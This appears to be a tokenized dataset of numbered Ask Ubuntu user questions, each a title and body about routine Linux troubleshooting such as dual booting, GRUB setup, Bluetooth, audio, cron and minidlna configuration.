502975	bluetooth problem - ubuntu 12.04 lts with asus laptop	i 'm trying to find the driver for bluetooth device for my asus k450jf laptop . i searched it in their support website , unfortunately there 's no support for ubuntu os . is there any alternative way for activate bluetooth in my machine ? thank you very much .
502976	ca n't do printscreen with open menu . xubuntu 14.04	i got problem when opening any menu ( e.g . wi-fi status menu at the top panel ) can not shot print screen . in any other case when menus are not active print works just fine with default settings xfce4-screenshooter -f. alt+print with command xfce4-screenshooter -w also did n't work . moreover when i try do print screen with open menu in firefox , first menu is hidden and then image is captured without opened menu .
502978	wicd tray panel icon ( 14.04 , unity )	i recently switched to wicd and i 'm really happy with it . but unfortunately it loads no panel icon . anything i can do ? thanks !
502980	ati free driver and fan speed	i have a sapphire 5850 gpu . when i install any drivers in ubuntu for it my games run very heavy - with some strange glitches in the video . i went back to the default driver and the games in steam run perfectly - but i can'tt control my fan speed with any command or tool . all ask for ccc and the ati driver . is there any solution for my problem ?
502981	understanding various update and upgrade commands	i want to know about different update and upgrade commands as follows : update upgrade dist-upgrade do-release-upgrade etc . for/as a new users of ubuntu and using/welcoming command-line , which is used and when ? . in brief help me to understand and rise my knowledge about use of above commands .
502985	ubuntu 14.04 / unity- onboard utility ( on-screen keyboard ) - desktop icon	i would like to have some easier way to launch `` onboard '' ( on-screen keyboard utility ) . once onboard is launched it conveniently sits on a service bar ( would be nice to have some improvements there too ) but before it is activated one needs to search for it in installed applications every time ubuntu is started . i would like to place onboard launcher on the desktop ( as it never appears in launcher bar so onboard can not be locked to it ) i have tried various recipes ( including making symbolic links ) but none is working for me . is it somehow possible to create a desktop icon to start onboard when it is not started ?
502987	what to do so that issue.net shows readable banner characters to chinese russian french ssh users	i set up my ssh server and added custom issue.net config . when loggin , it shows \320\237\320\264\321 ... . for characters other than ascii-7 is it a client side issue or do i manage this at server side ?
502994	changing mode everynow and then to boot from my required os	i am using a dual boot windows 8.1 and ubuntu 14.04 laptop.the thing is if i use legacy mode at the start in bios setup , i only get ubuntu and if i use uefi mode i can use windows 8.1 alone.do i have to do the same thing everytime or is there a better solution ?
502995	deja-dup : upgrading to 14.04	i 'm still running 12.04 , waiting for the automatic upgrade to show up in the update manager . i have a data partition different from my ubuntu home , where i keep mainly all my work and important documents . this is being backed up by deja-dup on an external hard-drive . if i upgrade to 14.04 , will i be able to `` resume '' these backups , knowing that the data partition and hard-drive wo n't be affected by the upgrade ? i would expect so , but i just want to make sure .
502996	pairing error with jawbone mini jambox	i just bought a mini jambox ( jawbone ) wireless bluetooth speaker . it work like a charm with my nexus 7 , iphone 4 and macbook pro . unfortunatly i can not make it work with my ubuntu 14.04 laptop . what i have done : enable bluetooth on my laptop run the bluetooth-wizard command select the mini jambox device after one minute , the wizard display an error message : failed to connect to the device ... i also have the following log : ( bluetooth-wizard:18445 ) : bluetooth-warning ** : createdevice failed : gdbus.error : org.bluez.error.connectionattemptfailed : page timeout ** ( bluetooth-wizard:18445 ) : warning ** : setting up 'minijambox by jawbone ' failed : gdbus.error : org.bluez.error.connectionattemptfailed : page timeout any idea ?
502998	windows non-boot raid	i 'm thinking about installing ubuntu on a windows machine for dual boot . there are three windows drives c : and d : are independent and g : is a raid ( 0/1 i think ) . what do i need to do to get the raid recognized under linux ? ( a previous attempt on a similar computer resulted in 2 separate drives - but that was not dual boot . )
502999	can i replace elementary os with ubuntu ?	i have windows 7 as my primary os in local disk ( c : ) and elementary os ( ubuntu-based os ) as my secondary on some other partition . so i 'm dual booting windows & elementary . i want to remove elementary now . elementary os is in 10gb partition and has 1gb swap area . now i want to return back to ubuntu . but the question is- do i really need to delete & format partition ( 10gb ) of elementary to install ubuntu ? -or- can i install ubuntu directly on that partition without deleting & formatting ? and what about the swap area ? i 've more questions on this topic but i 'll ask them after someone responds to this question .
503001	ssh to cluster under a vpn	my university requires that i connect to vpn , in order to connect to our cluster . i have , after a long struggle , managed to connect to the vpn using the forticlient vpn command line interface . my problem is that when i now try to ssh to the particular cluster , the connection times out . i have successfully connected to the cluster , using windows with forticlient and putty , and was thus wondering how to do this on ubuntu ? i am running ubuntu 13.04 , with uname -a giving : uname -a linux nirvana 3.8.0-35-generic # 50-ubuntu smp tue dec 3 01:24:59 utc 2013 x86_64 x86_64 x86_64 gnu/linux
503005	how open folders from usb devices in terminal and find the size	i am very new in ubuntu . i just plugged my mobile in ubuntu and the two memory cards appears to me . but i was interested to find out the total free space and how much used for each folder . i guess that i have to use df + something .
503006	shell script not working	for a suggested solution in another topic i tried to write my first shell script . it did not work as intended . in order to get a quick access to the folder /opt/lampp/htdocs when using xampp i tried to create a desktop shell script : gksudo nautilus /opt/lampp/htdocs and saved it to a file named htdocs_open.sh and saved it on my desktop ( `` skrivbord '' in swedish ) under the folder /home/lars/skrivbord i also changed the permissions using : chmod +x htdocs_open.sh when i check the permissions it now looks like this : -rwxrwxr-x 1 lars lars 35 jul 26 16:31 htdocs_open.sh* -rwxrwxr-x 1 lars lars 34 jul 25 23:43 htdocs_open.sh~* when i doubbleclick the icon on my desktop it just open up the script in gedit . why do i get a double set of files with one having `` ~ '' in the end ? why is my shell script not running as a shell script ?
503008	unable to upgrade ubuntu 12.04.4 lts to ubuntu 14.04.1 lts	i am unable to upgrade from ubuntu 12.04.4 lts to ubuntu 14.04.1 lts . the only options from the boot cd are options 2 and 3 , to erase all data or the partitions . option 1 is grayed out , which is what i want to do and not selectable . i am running a dual boot with windows vista . my ubuntu is on a usb portable hdd .
503009	issue regarding swap in ubuntu 14.04	as on my way of ubuntu installation , i have encountered an issue regarding swap area . i have selected the root area and i was trying to install ubuntu on my windows disk partition everything was ready for the installation process of ubuntu but i was prompted that i should specify an amount 4.7 gb for swap area which i was not aware of.. so i thought of restarting the installation process with a separate partition for swap area but i came across to know that swap area in ubuntu is just like ram in windows.. so i gave my 80 gb media partition to swap area so that it can grab the space required for it and leaves me a space at least 75 gb , but after installing i was shocked to see that my entire windows disk partition of 80gb , which contains the media that i desperately need . so i request you to suggest me way to get back my drive without losing its content for god sake ... am thinking of uninstalling ubuntu by using windows recovery disk ... ? ? ? ? image : does this gets back my drive ? ? ?
503011	how to change desktop background in ubuntu desktop	i was using gnome desktop environment at the start but i switched to unity environment by install unity shell via this command sudo apt get install ubuntu-desktop after this i have many issues like i cant change my desktop background while using unity environment and i can not lock the screen while using gnome desktop can any one help me to get out of this problem .
503014	sound does n't work after running vlc	i just recently installed ubuntu 14.04 and now , after i ran vlc for the first time , the audio does n't work anymore . before , everything worked just fine , but as soon as i opened a mkv-video in vlc , the audio for the whole system stopped working . after that i removed vlc and any plugins that have been installed with it , rebooted , but nothing changed . neither my monitor speakers nor my headset is working anymore , so i think it might be a problem with pulseaudio . edit here is a screenshot of my sound settings . also to mention , my monitor speakers are hooked up to my nvidia graphics card via hdmi . ( newest graphics drivers are installed ) . another edit i just noticed that youtube videos also wo n't play anymore , neither video nor sound . it just freezes at the first frame , continues buffering but does n't play . i recently installed flashplayer , but removed it again because it was causing problems . so i 'm using the native html5-player of youtube . i tried both firefox and chrome .
503017	how to uninstall ubuntu safely	i currently have windows 8 , ubuntu 12.04 and ubuntu 14.04 ( on my dell inspiron 14z pre-installed windows 8 with secure boot nand uefi mode ) . i had installed 12.04 lts as a requirement for a project and now wish to uninstall it . how do i do so safely ? i am guessing just formatting the drive containing the 12.04 version os would n't be the best way , so looking for a clean/safe method to erase all data in 12.04 version and uninstall the os itself . thanks !
503018	update manager does not update	good afternoon everyone ; i am trying to update my system using update manager . however , i face with this error message ; preconfiguring packages ... setting up util-linux ( 2.20.1-1ubuntu3.1 ) ... update-alternatives : error : can not stat file '/usr/share/icons/dmz-white/cursor.theme ' : not a directory dpkg : error processing util-linux ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : util-linux setting up plymouth-theme-ubuntu-text ( 0.8.2-2ubuntu31.1 ) ... update-alternatives : error : can not stat file '/usr/share/icons/dmz-white/cursor.theme ' : not a directory dpkg : error processing plymouth-theme-ubuntu-text ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up util-linux ( 2.20.1-1ubuntu3.1 ) ... update-alternatives : error : can not stat file '/usr/share/icons/dmz-white/cursor.theme ' : not a directory dpkg : error processing util-linux ( -- configure ) : subprocess installed post-installation script returned error exit status 2 i searched this problem over the internet and i tried these commands ; sudo apt-get upgrade install -f sudo dpkg -- configure -a sudo dpkg-reconfigure -a however , none of them seems to be working . could you help me please ? ( i use elementary os )
503019	how to correctly restore factory condition on acer laptop ?	i have installed ubuntu alongside windows 7 ( dual-boot ) . ubuntu is great but windows is showing some problems : i 'd like to just restore windows as it was the first day without touching my ubuntu installation whatsoever do you know if it 's possible ? i have the rescue disks made with acer erecovery management the day i bought the pc i do n't have any other windows disk to just re-install it i know i 'll probably have to re-install grub , but that 's not my problem right now the factory restore partition sits untouched on my hard-drive since day 1 please do n't tell me to just remove windows - > not an option
503020	linux-image-virtual packages empty in 14.04 trusty ?	i ca n't seem to get a linux-virtual kernel ( for vms ) installed in trusty . the packages install perfectly fine , but they simply are empty , without anything except changelog and copyright files in usr/share/doc . what 's the proper procedure to install -virtual kernel on ubuntu 14.04 trusty ? or is the whole thing deprecated now ? thanks for reference : root @ s2 : /boot/grub # dpkg -l linux-virtual / . /usr /usr/share /usr/share/doc /usr/share/doc/linux-virtual /usr/share/doc/linux-virtual/copyright /usr/share/doc/linux-virtual/changelog.gz root @ s2 : /boot/grub # dpkg -l linux-image-virtual / . /usr /usr/share /usr/share/doc /usr/share/doc/linux-image-virtual /usr/share/doc/linux-image-virtual/copyright /usr/share/doc/linux-image-virtual/changelog.gz root @ s2 : /boot/grub # dpkg -l linux-image-extra-virtual / . /usr /usr/share /usr/share/doc /usr/share/doc/linux-image-extra-virtual /usr/share/doc/linux-image-extra-virtual/copyright /usr/share/doc/linux-image-extra-virtual/changelog.gz root @ s2 : /boot/grub # dpkg -l linux-headers-virtual / . /usr /usr/share /usr/share/doc /usr/share/doc/linux-headers-virtual /usr/share/doc/linux-headers-virtual/copyright /usr/share/doc/linux-headers-virtual/changelog.gz root @ s2 : /boot/grub # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty
503022	ubuntu desktop not showing	when i opened ubuntu for the first time , it installed successfully . but every time i want to boot it . ubuntu opens a command line instead of the desktop . i searched on the internet for commands but they are not helping . does anyone knows what the problem is ?
503027	configuring grub for ubuntu on lenovo ideapad flex 10	situation i have installed ubuntu linux 14.04 on a lenovo ideapad flex 10 . the only problem i 'm facing now is to configure the bootloader . i 'm quite familiar with ubuntu , but not with grub or bootloaders in general . this system has uefi , and windows 8.1 is still installed on the harddisk . ubuntu is installed on partition sda9 , but it does not boot . when i remove the usb stick with the live install , windows boots . i followed these two guides : how do i install linux mint 17 from usb on flex 10 ? : cigydd answers his own question with 11 steps . i succeeded to step 7 . ubuntu ( or other linux ) on the asus transformer book t100 : i started at step 4 , and got stuck here . see the ubuntu pastebin for root-repair bounty i 've put a 50 point bounty on this question , but have n't awarded it because the answers did n't help me any further . i will award 50 points again if an answer here helps me get this working . efi firmware the flex 10 has a 32-bit efi firmware , which complicates things a bit . following above guides , i 've downloaded bootia32.efi and put it on the ubuntu stick in /efi/boot . in the same folder i see two other files : bootx64.efi and grubx64.efi . problem i 'm stuck in the second guide , step 4 , with the following line : linux ( hd2 , gpt5 ) /boot/vmlinuz-3.13-xxxx root=/dev/mmcblk0p5 video=vga-1:1368x768e reboot=pci , force the partition is hd2 , gpt9 if i 'm correct . strangely enough , it seems i need to leave a space after the comma : linux ( hd2 , gpt9 ) /boot/ ... using the live system , i found the vmlinuz version : /boot/vmlinuz-3.13.0-32-generic /boot/vmlinuz-3.13.0-32-generic.efi.signed i do n't know what to do with the root=/dev/ ... setting . below you see the output for ls -al /dev for the installed partition . root @ ubuntu : /media/disk9 # ls -al dev total 16 drwxr-xr-x 4 root root 4096 apr 17 01:26 . drwxr-xr-x 23 root root 4096 jul 26 11:24 .. crw-rw -- -- 1 root video 10 , 175 apr 17 01:21 agpgart crw-rw -- -- 1 root audio 14 , 4 apr 17 01:21 audio crw-rw -- -- 1 root audio 14 , 20 apr 17 01:21 audio1 crw-rw -- -- 1 root audio 14 , 36 apr 17 01:21 audio2 crw-rw -- -- 1 root audio 14 , 52 apr 17 01:21 audio3 crw-rw -- -- 1 root audio 14 , 7 apr 17 01:21 audioctl crw -- -- -- - 1 root tty 5 , 1 apr 17 01:21 console lrwxrwxrwx 1 root root 11 jul 26 11:08 core - > /proc/kcore crw-rw -- -- 1 root audio 14 , 3 apr 17 01:21 dsp crw-rw -- -- 1 root audio 14 , 19 apr 17 01:21 dsp1 crw-rw -- -- 1 root audio 14 , 35 apr 17 01:21 dsp2 crw-rw -- -- 1 root audio 14 , 51 apr 17 01:21 dsp3 lrwxrwxrwx 1 root root 13 jul 26 11:08 fd - > /proc/self/fd crw-rw-rw- 1 root root 1 , 7 apr 17 01:21 full crw-rw -- -- 1 root fuse 10 , 229 apr 17 01:22 fuse crw-r -- -- - 1 root kmem 1 , 2 apr 17 01:21 kmem brw-rw -- -- 1 root disk 7 , 0 apr 17 01:21 loop0 brw-rw -- -- 1 root disk 7 , 1 apr 17 01:21 loop1 brw-rw -- -- 1 root disk 7 , 2 apr 17 01:21 loop2 brw-rw -- -- 1 root disk 7 , 3 apr 17 01:21 loop3 brw-rw -- -- 1 root disk 7 , 4 apr 17 01:21 loop4 brw-rw -- -- 1 root disk 7 , 5 apr 17 01:21 loop5 brw-rw -- -- 1 root disk 7 , 6 apr 17 01:21 loop6 brw-rw -- -- 1 root disk 7 , 7 apr 17 01:21 loop7 drwxr-xr-x 2 root root 4096 apr 17 01:26 mapper crw-r -- -- - 1 root kmem 1 , 1 apr 17 01:21 mem crw-rw -- -- 1 root audio 35 , 0 apr 17 01:21 midi0 crw-rw -- -- 1 root audio 14 , 2 apr 17 01:21 midi00 crw-rw -- -- 1 root audio 14 , 18 apr 17 01:21 midi01 crw-rw -- -- 1 root audio 14 , 34 apr 17 01:21 midi02 crw-rw -- -- 1 root audio 14 , 50 apr 17 01:21 midi03 crw-rw -- -- 1 root audio 35 , 1 apr 17 01:21 midi1 crw-rw -- -- 1 root audio 35 , 2 apr 17 01:21 midi2 crw-rw -- -- 1 root audio 35 , 3 apr 17 01:21 midi3 crw-rw -- -- 1 root audio 14 , 0 apr 17 01:21 mixer crw-rw -- -- 1 root audio 14 , 16 apr 17 01:21 mixer1 crw-rw -- -- 1 root audio 14 , 32 apr 17 01:21 mixer2 crw-rw -- -- 1 root audio 14 , 48 apr 17 01:21 mixer3 crw-rw -- -- 1 root audio 31 , 0 apr 17 01:21 mpu401data crw-rw -- -- 1 root audio 31 , 1 apr 17 01:21 mpu401stat crw-rw-rw- 1 root root 1 , 3 apr 17 01:21 null crw-r -- -- - 1 root kmem 1 , 4 apr 17 01:21 port crw-rw-rw- 1 root tty 5 , 2 feb 14 02:04 ptmx drwxr-xr-x 2 root root 4096 apr 17 01:21 pts lrwxrwxrwx 1 root root 4 jul 26 11:08 ram - > ram1 brw-rw -- -- 1 root disk 1 , 0 apr 17 01:21 ram0 brw-rw -- -- 1 root disk 1 , 1 apr 17 01:21 ram1 brw-rw -- -- 1 root disk 1 , 10 apr 17 01:21 ram10 brw-rw -- -- 1 root disk 1 , 11 apr 17 01:21 ram11 brw-rw -- -- 1 root disk 1 , 12 apr 17 01:21 ram12 brw-rw -- -- 1 root disk 1 , 13 apr 17 01:21 ram13 brw-rw -- -- 1 root disk 1 , 14 apr 17 01:21 ram14 brw-rw -- -- 1 root disk 1 , 15 apr 17 01:21 ram15 brw-rw -- -- 1 root disk 1 , 16 apr 17 01:21 ram16 brw-rw -- -- 1 root disk 1 , 2 apr 17 01:21 ram2 brw-rw -- -- 1 root disk 1 , 3 apr 17 01:21 ram3 brw-rw -- -- 1 root disk 1 , 4 apr 17 01:21 ram4 brw-rw -- -- 1 root disk 1 , 5 apr 17 01:21 ram5 brw-rw -- -- 1 root disk 1 , 6 apr 17 01:21 ram6 brw-rw -- -- 1 root disk 1 , 7 apr 17 01:21 ram7 brw-rw -- -- 1 root disk 1 , 8 apr 17 01:21 ram8 brw-rw -- -- 1 root disk 1 , 9 apr 17 01:21 ram9 crw-rw-rw- 1 root root 1 , 8 apr 17 01:21 random crw-rw -- -- 1 root audio 35 , 64 apr 17 01:21 rmidi0 crw-rw -- -- 1 root audio 35 , 65 apr 17 01:21 rmidi1 crw-rw -- -- 1 root audio 35 , 66 apr 17 01:21 rmidi2 crw-rw -- -- 1 root audio 35 , 67 apr 17 01:21 rmidi3 crw-rw -- -- 1 root audio 14 , 1 apr 17 01:21 sequencer lrwxrwxrwx 1 root root 8 jul 26 11:08 shm - > /run/shm crw-rw -- -- 1 root audio 35 , 128 apr 17 01:21 smpte0 crw-rw -- -- 1 root audio 35 , 129 apr 17 01:21 smpte1 crw-rw -- -- 1 root audio 35 , 130 apr 17 01:21 smpte2 crw-rw -- -- 1 root audio 35 , 131 apr 17 01:21 smpte3 crw-rw -- -- 1 root audio 14 , 6 apr 17 01:21 sndstat lrwxrwxrwx 1 root root 4 jul 26 11:08 stderr - > fd/2 lrwxrwxrwx 1 root root 4 jul 26 11:08 stdin - > fd/0 lrwxrwxrwx 1 root root 4 jul 26 11:08 stdout - > fd/1 crw-rw-rw- 1 root tty 5 , 0 apr 17 01:21 tty crw -- -- -- - 1 root tty 4 , 0 apr 17 01:21 tty0 crw -- -- -- - 1 root tty 4 , 1 apr 17 01:21 tty1 crw -- -- -- - 1 root tty 4 , 2 apr 17 01:21 tty2 crw -- -- -- - 1 root tty 4 , 3 apr 17 01:21 tty3 crw -- -- -- - 1 root tty 4 , 4 apr 17 01:21 tty4 crw -- -- -- - 1 root tty 4 , 5 apr 17 01:21 tty5 crw -- -- -- - 1 root tty 4 , 6 apr 17 01:21 tty6 crw -- -- -- - 1 root tty 4 , 7 apr 17 01:21 tty7 crw -- -- -- - 1 root tty 4 , 8 apr 17 01:21 tty8 crw -- -- -- - 1 root tty 4 , 9 apr 17 01:21 tty9 crw-rw-rw- 1 root root 1 , 9 apr 17 01:21 urandom crw-rw-rw- 1 root root 1 , 5 apr 17 01:21 zero this would result in the following command for grub : linux ( hd2 , gpt9 ) /boot/vmlinuz-3.13.0-32-generic root=/dev/ ? ? ? ? ? video=vga-1:1366x768e reboot=pci , force output for cat /proc/partitions as requested by user309427 ubuntu @ ubuntu : ~ $ cat /proc/partitions major minor # blocks name 7 0 944156 loop0 8 0 312571224 sda 8 1 1024000 sda1 8 2 266240 sda2 8 3 131072 sda3 8 4 148405248 sda4 8 5 460800 sda5 8 6 26214400 sda6 8 7 13188096 sda7 8 8 3999744 sda8 8 9 24414208 sda9 8 10 94466048 sda10 8 16 1957888 sdb 8 17 1956864 sdb1 output for mount as requested by user309427 ubuntu @ ubuntu : ~ $ mount /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sdb1 on /cdrom type vfat ( ro , noatime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/999/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=ubuntu ) output for blkid as requested by bain ubuntu is installed on sda9 , and sda10 is the home partition . ubuntu @ ubuntu : ~ $ sudo su root @ ubuntu : /home/ubuntu # blkid /dev/loop0 : type= '' squashfs '' /dev/sda1 : label= '' winre_drv '' uuid= '' ce4a98414a98286b '' type= '' ntfs '' /dev/sda2 : label= '' system_drv '' uuid= '' 329b-10f9 '' type= '' vfat '' /dev/sda4 : uuid= '' c28ccb398ccb26af '' type= '' ntfs '' /dev/sda5 : uuid= '' 70601c2e601bfa14 '' type= '' ntfs '' /dev/sda6 : label= '' lenovo '' uuid= '' 48b255e5b255d7d0 '' type= '' ntfs '' /dev/sda7 : label= '' pbr_drv '' uuid= '' 6a72a04272a014bb '' type= '' ntfs '' /dev/sda9 : uuid= '' 673b6434-a5f0-49f0-8a01-af6894958777 '' type= '' ext4 '' /dev/sda10 : uuid= '' dd7b47a9-33bf-4b73-a880-6e7e488e9c79 '' type= '' ext4 '' /dev/sdc1 : label= '' ubuntu 14_0 '' uuid= '' 1c9c-cb71 '' type= '' vfat '' questions what setting should i use for the root setting ? the screen resolution of my system is 1366x768 , not 1368x768 . what is the setting for the video ? besides all this , is this the way to get grub working properly ? maybe i misunderstand , but i read i should copy bootia32.efi to the disk . to what folder ? i do n't see an efi folder in the root of the installed system .
503028	how to launch interactive shell script in bash hourly with cron ?	i put this line in the crontab : 1 * * * * display=:0.0 /usr/bin/gnome-terminal -e /home/user/desktop/mltpl the script is executable . if paste that command in the terminal -- that is , the string without stars , it works perfectly : display=:0.0 /usr/bin/gnome-terminal -e /home/user/desktop/mltpl i tried : sudo service cron restart but the problem persists . how can i get cron to run that command hourly ? update . got it working with root crontab : 1 * * * * display=:0 xdg_runtime_dir=/run/user/1000 xauthority=/home/user/.xauthority /usr/bin/gnome-terminal -e /home/user/desktop/mltpl
503031	how to reinstall 14.04 after broken upgrade	if i have a broken upgrade , is there a way to re-run the upgrade again ? background : i had 12.04 lts installed in a dual boot setup . i wanted to upgrade to 14.04 lts ( primarily in the hope of solving a problem where sound suddenly stopped working ) . i ran do-release-upgrade and my laptop shutdown in the middle of the process . i rebooted and ran do-release-upgrade again . it finished with errors and booted into command line mode . after trying to reinstall ubuntu-desktop , the desktop comes up but all the window decorations are black . if i bring up a terminal it is black on black which is useless . ( i should know at this stage of my life never to do an upgrade : - ) ) . update : when running from the live usb ( or whatever ) i noticed that i had inadvertently upgraded to 14.10 , which is not what i intended . i suspect i will just need to bit the bullet and reinstall . update : i deleted the old partitions and just reinstalled . ( unfortunately , the first thing i clicked on `` amazon '' seg faulted . does n't bode well . )
503032	how can i make my wifi hotspot secure ?	i just created a wifi hotspot with an adaptor , and it says that it uses wep security . i may be mistaken , but is n't wep security not really secure ? how can i make it more secure , such as wpa or wpa2 ? i 'm quite concerned that someone could access my computer ( s ) . edit i do n't want an answer that is a cure rather than a prevention . i would like stronger encryption , not to individually block people who intrude - by then they may have my data . it would be acceptable to only allow certain mac address , but i would need an approval process , so that guests could connect to the wifi without finding their mac addresses .
503033	zip is corrupted , unpacks on mac but not on ubuntu	i have a zip file that is indeed corrupted . it contains one file that is fine , and a second that is 0bytes and corrupted . but when i unpack it on my mac ( double click in finder ) , it does unpack and i 'm able to see the files . when i try to unzip it using the command line in ubuntu , i get a zip @ zip-test ~ ] # unzip test.zip archive : test.zip end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . unzip : can not find zipfile directory in one of test.zip or test.zip.zip , and can not find test.zip.zip , period . i 've also tried : [ zip @ zip-test ~ ] # jar xvf test.zip inflated : data-2014-07-25-08-55-10.gps java.io.eofexception : unexpected end of zlib input stream at java.util.zip.inflaterinputstream.fill ( inflaterinputstream.java:240 ) at java.util.zip.inflaterinputstream.read ( inflaterinputstream.java:158 ) at java.util.zip.zipinputstream.read ( zipinputstream.java:163 ) at java.util.zip.zipinputstream.closeentry ( zipinputstream.java:109 ) at sun.tools.jar.main.extractfile ( main.java:954 ) at sun.tools.jar.main.extract ( main.java:870 ) at sun.tools.jar.main.run ( main.java:260 ) at sun.tools.jar.main.main ( main.java:1167 ) and lastly i 've tried [ zip @ zip-test ~ ] # 7za x test.zip 7-zip ( a ) [ 64 ] 9.20 copyright ( c ) 1999-2010 igor pavlov 2010-11-18 p7zip version 9.20 ( locale=en_us.utf-8 , utf16=on , hugefiles=on,1 cpu ) processing archive : test.zip error : can not open file as archive but since i can unzip it on the mac , it seems like there should be some way to force the package to unzip . any ideas on what else to try ? edit : you can find the file here : http : //cl.ly/1n3g0z3q3g3u
503037	juju illegal base64 data at input byte 9	after bootstrap a environment via manual provisioning , juju give me the following output for juju status : error unable to connect to environment `` manual '' . please check your credentials or use 'juju bootstrap ' to create a new environment . error details : illegal base64 data at input byte 9 and doing bootstrap again shows me : warning ignoring environments.yaml : using bootstrap config in file `` /home/ayrton/.juju/environments/manual.jenv '' error illegal base64 data at input byte 9 the first bootstrap shows me no error , but the status crash as above and the second one output is just the base64 error . my juju version is 1.19.4-trusty-amd64 , running in trusty 64 . the bootstrap environment is a vps with 1gb of memory , 20gb of hd and precise 64bits . please , let me know if i can provide any further information .
503039	how to create accurately timed soft video sub titles ?	i know how to create soft subtitles with a text editor and saving the text file as a srt file . but it 's taking very long and and timing is n't the best as i am starting and stopping the video using vlc to get the start and stop times . does a better program exists which makes it easier to create the soft sub titles ? so the timing is a lot easier and simpler to get right ?
503043	g-spy usb mouse is not recognized	my mouse ( zalman zm-m401r ) is recognized as keyboard not as mouse . but other mouse working good . is possible to fix this issue ? xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ pixart usb optical mouse id=10 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ usb2.0 uvc hd webcam id=11 [ slave keyboard ( 3 ) ] ↳ asus wmi hotkeys id=12 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ] ↳ g-spy usb gaming mouse id=15 [ slave keyboard ( 3 ) ] pixart usb optical mouse works great , but i want g-spy usb gaming mouse to work . thanks
503044	external hdmi monitor turns off after a few minutes	when connecting my 14.04 ubuntu laptop with hdmi to my tv , the image is turned off after a few minutes , even when connected to the power . i then move the mouse and the image returns . how can i prevent the monitor from turning off ? notice the laptop does not go into sleep mode , just turns off the monitor
503045	how to clean up remnants of old versions ?	i have a laptop with 14.04 installed on it , and i 've had ubuntu on this machine since 12.04 . i notice that i have `` duplicates '' ( old versions ) of some programs , namely update manager , belonging to both the older versions and the new . is there a good way to clean these out of here ?
503046	pulseaudio connection failed	a couple of days ago i upgraded my ubuntu 14.04 with the latest updates from the update manager . everything was working fine prior the updates , but once the update were completed and the system restarted the sound indicator was not showing . pavu control is displaying a connection error with pulse audio and the sound application is showing no sound devices . i tried reinstalling alas-base and pulse audio but to no avail . was anyone affected with this problem after a recent update , or does anyone have any tips on how this problem can be solved ? . also firefox was updated to 31 which made it very sluggish in opening context menus . thank you , andrew borg
503048	minidlna mass storage configuration in trusty 14.04.1 - howto ?	i reinstalled my desktop for trusty and i installed minidlna . at trusty install time i decided to insist in using an internal 1tb sata drive to store multimedia files for minidlna usage . i had this whole drive formated with 4gb for swap , 5gb for /tmp , 5gb for /var and the remaining 900+gb as an ext4 partition that i specified will be mounted as /srv in the ubuntu install wizard . in precise , i met trouble/puzzle to easily use this . now , i created directories : sudo -i mkdir -p /srv/minidlna/movies mkdir /srv/minidlna/music mkdir /srv/minidlna/pictures and populated them with a backup copy . /srv will later also be used to store she and me $ home weekly backups ( deja-dup over ssh ) from our respective laptops ... just to say it is not really fully dedicated to minidlna . i have 3 pam user accounts : me ( single administrator in the machine ) , she , and ... kids . i also have the minidlna service running with default personality ( i do n't know if i can say it is user minidlna or root , but that do n't really matters as i 'd rather keep it as is if nobody gives a good advise to change this ( # user=minidlna directive ) ) . in minidlna.conf i would just change the mass-storage target and inotify=yes . i apply the same 755 minidlna : minidlna permissions/ownership to /srv/minidlna as they are on the /var/lib/minidlna default target : chown -r minidlna /srv/minidlna chgrp -r minidlna /srv/minidlna chmod -r 755 minidlna service minidlna restart which ends ~ok~ ( roughly translated ) in [ 2014/07/26 18:28:20 ] minidlna.c:153 : warn : received signal 15 , good-bye [ 2014/07/26 18:28:21 ] minidlna.c:1004 : warn : starting minidlna version 1.1.2 . [ 2014/07/26 18:28:21 ] minidlna.c:356 : warn : new media_dir detected ; rescanning ... [ 2014/07/26 18:28:21 ] minidlna.c:1043 : warn : http listening on port 8200 [ 2014/07/26 18:28:21 ] scanner.c:702 : warn : analysing de /srv/minidlna [ 2014/07/26 18:29:11 ] scanner.c:789 : warn : analysing /srv/minidlna ended ( 2960 files ) ! [ 2014/07/26 18:29:11 ] playlist.c:125 : warn : parsing playlists ... [ 2014/07/26 18:29:11 ] playlist.c:256 : warn : finished parsing playlists . [ 2014/07/26 18:29:12 ] inotify.c:198 : warn : warning : inotify max_user_watches [ 8192 ] is low or close to the number of used watches [ 47 ] and i do not have permission to increase this 